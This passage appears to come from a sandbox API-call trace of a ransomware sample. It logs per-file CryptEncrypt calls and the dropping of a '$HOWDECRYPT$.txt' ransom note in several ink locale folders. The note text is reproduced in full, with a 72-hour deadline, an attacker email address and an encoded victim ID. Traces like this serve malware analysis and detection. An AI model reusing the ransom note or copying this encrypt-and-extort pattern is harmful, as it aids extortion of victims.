pdwDataLen=0x25cfe50*=0x30) returned 1 [0087.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.372] GetProcessHeap () returned 0x2c0000 [0087.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.372] GetProcessHeap () returned 0x2c0000 [0087.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0087.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe50 | out: pbBuffer=0x25cfe50) returned 1 [0087.372] GetProcessHeap () returned 0x2c0000 [0087.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe48*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe48*=0x30) returned 1 [0087.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.372] GetProcessHeap () returned 0x2c0000 [0087.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.373] GetProcessHeap () returned 0x2c0000 [0087.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0087.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.373] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.373] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfeac, lpOverlapped=0x0 | out: lpBuffer=0x25cfd83*, lpNumberOfBytesWritten=0x25cfeac*=0x127, lpOverlapped=0x0) returned 1 [0087.374] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.374] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfeac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfeac*=0x2ac, lpOverlapped=0x0) returned 1 [0087.375] CloseHandle (hObject=0x174) returned 1 [0087.375] GetProcessHeap () returned 0x2c0000 [0087.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373d90 | out: hHeap=0x2c0000) returned 1 [0087.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe48 | out: pbBuffer=0x25cfe48) returned 1 [0087.375] GetProcessHeap () returned 0x2c0000 [0087.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe40*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe40*=0x30) returned 1 [0087.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.375] GetProcessHeap () returned 0x2c0000 [0087.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.375] GetProcessHeap () returned 0x2c0000 [0087.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373ca8 | out: hHeap=0x2c0000) returned 1 [0087.376] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe48 | out: pbBuffer=0x25cfe48) returned 1 [0087.376] GetProcessHeap () returned 0x2c0000 [0087.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.376] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe40*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe40*=0x30) returned 1 [0087.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.376] GetProcessHeap () returned 0x2c0000 [0087.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.376] GetProcessHeap () returned 0x2c0000 [0087.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3582d0 | out: hHeap=0x2c0000) returned 1 [0087.376] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe40 | out: pbBuffer=0x25cfe40) returned 1 [0087.376] GetProcessHeap () returned 0x2c0000 [0087.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.376] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe38*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe38*=0x30) returned 1 [0087.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.376] GetProcessHeap () returned 0x2c0000 [0087.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.376] GetProcessHeap () returned 0x2c0000 [0087.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358200 | out: hHeap=0x2c0000) returned 1 [0087.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe40 | out: pbBuffer=0x25cfe40) returned 1 [0087.377] GetProcessHeap () returned 0x2c0000 [0087.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe38*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe38*=0x30) returned 1 [0087.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.380] GetProcessHeap () returned 0x2c0000 [0087.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.380] GetProcessHeap () returned 0x2c0000 [0087.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358130 | out: hHeap=0x2c0000) returned 1 [0087.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.380] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.380] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe98, lpOverlapped=0x0 | out: lpBuffer=0x25cfd6f*, lpNumberOfBytesWritten=0x25cfe98*=0x127, lpOverlapped=0x0) returned 1 [0087.382] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.382] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe98, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe98*=0x2ac, lpOverlapped=0x0) returned 1 [0087.382] CloseHandle (hObject=0x174) returned 1 [0087.382] GetProcessHeap () returned 0x2c0000 [0087.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373bc0 | out: hHeap=0x2c0000) returned 1 [0087.383] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe38 | out: pbBuffer=0x25cfe38) returned 1 [0087.383] GetProcessHeap () returned 0x2c0000 [0087.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.383] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe30*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe30*=0x30) returned 1 [0087.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.383] GetProcessHeap () returned 0x2c0000 [0087.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.383] GetProcessHeap () returned 0x2c0000 [0087.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373ad8 | out: hHeap=0x2c0000) returned 1 [0087.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.383] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.383] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd67*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe90, lpOverlapped=0x0 | out: lpBuffer=0x25cfd67*, lpNumberOfBytesWritten=0x25cfe90*=0x127, lpOverlapped=0x0) returned 1 [0087.384] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.384] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe90, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe90*=0x2ac, lpOverlapped=0x0) returned 1 [0087.385] CloseHandle (hObject=0x174) returned 1 [0087.385] GetProcessHeap () returned 0x2c0000 [0087.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329368 | out: hHeap=0x2c0000) returned 1 [0087.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe30 | out: pbBuffer=0x25cfe30) returned 1 [0087.385] GetProcessHeap () returned 0x2c0000 [0087.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe28*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe28*=0x30) returned 1 [0087.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.387] GetProcessHeap () returned 0x2c0000 [0087.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.387] GetProcessHeap () returned 0x2c0000 [0087.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329278 | out: hHeap=0x2c0000) returned 1 [0087.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.388] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.388] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe88, lpOverlapped=0x0 | out: lpBuffer=0x25cfd5f*, lpNumberOfBytesWritten=0x25cfe88*=0x127, lpOverlapped=0x0) returned 1 [0087.389] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.389] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe88*=0x2ac, lpOverlapped=0x0) returned 1 [0087.389] CloseHandle (hObject=0x174) returned 1 [0087.389] GetProcessHeap () returned 0x2c0000 [0087.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3739f0 | out: hHeap=0x2c0000) returned 1 [0087.389] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe28 | out: pbBuffer=0x25cfe28) returned 1 [0087.389] GetProcessHeap () returned 0x2c0000 [0087.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.389] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe20*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe20*=0x30) returned 1 [0087.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.390] GetProcessHeap () returned 0x2c0000 [0087.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.390] GetProcessHeap () returned 0x2c0000 [0087.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373908 | out: hHeap=0x2c0000) returned 1 [0087.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.390] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.390] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe80, lpOverlapped=0x0 | out: lpBuffer=0x25cfd57*, lpNumberOfBytesWritten=0x25cfe80*=0x127, lpOverlapped=0x0) returned 1 [0087.391] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.391] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe80*=0x2ac, lpOverlapped=0x0) returned 1 [0087.392] CloseHandle (hObject=0x174) returned 1 [0087.392] GetProcessHeap () returned 0x2c0000 [0087.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373820 | out: hHeap=0x2c0000) returned 1 [0087.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe20 | out: pbBuffer=0x25cfe20) returned 1 [0087.392] GetProcessHeap () returned 0x2c0000 [0087.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe18*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe18*=0x30) returned 1 [0087.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.392] GetProcessHeap () returned 0x2c0000 [0087.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.392] GetProcessHeap () returned 0x2c0000 [0087.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3736f0 | out: hHeap=0x2c0000) returned 1 [0087.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe18 | out: pbBuffer=0x25cfe18) returned 1 [0087.393] GetProcessHeap () returned 0x2c0000 [0087.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe10*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe10*=0x30) returned 1 [0087.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.393] GetProcessHeap () returned 0x2c0000 [0087.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.393] GetProcessHeap () returned 0x2c0000 [0087.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384b80 | out: hHeap=0x2c0000) returned 1 [0087.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.393] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour 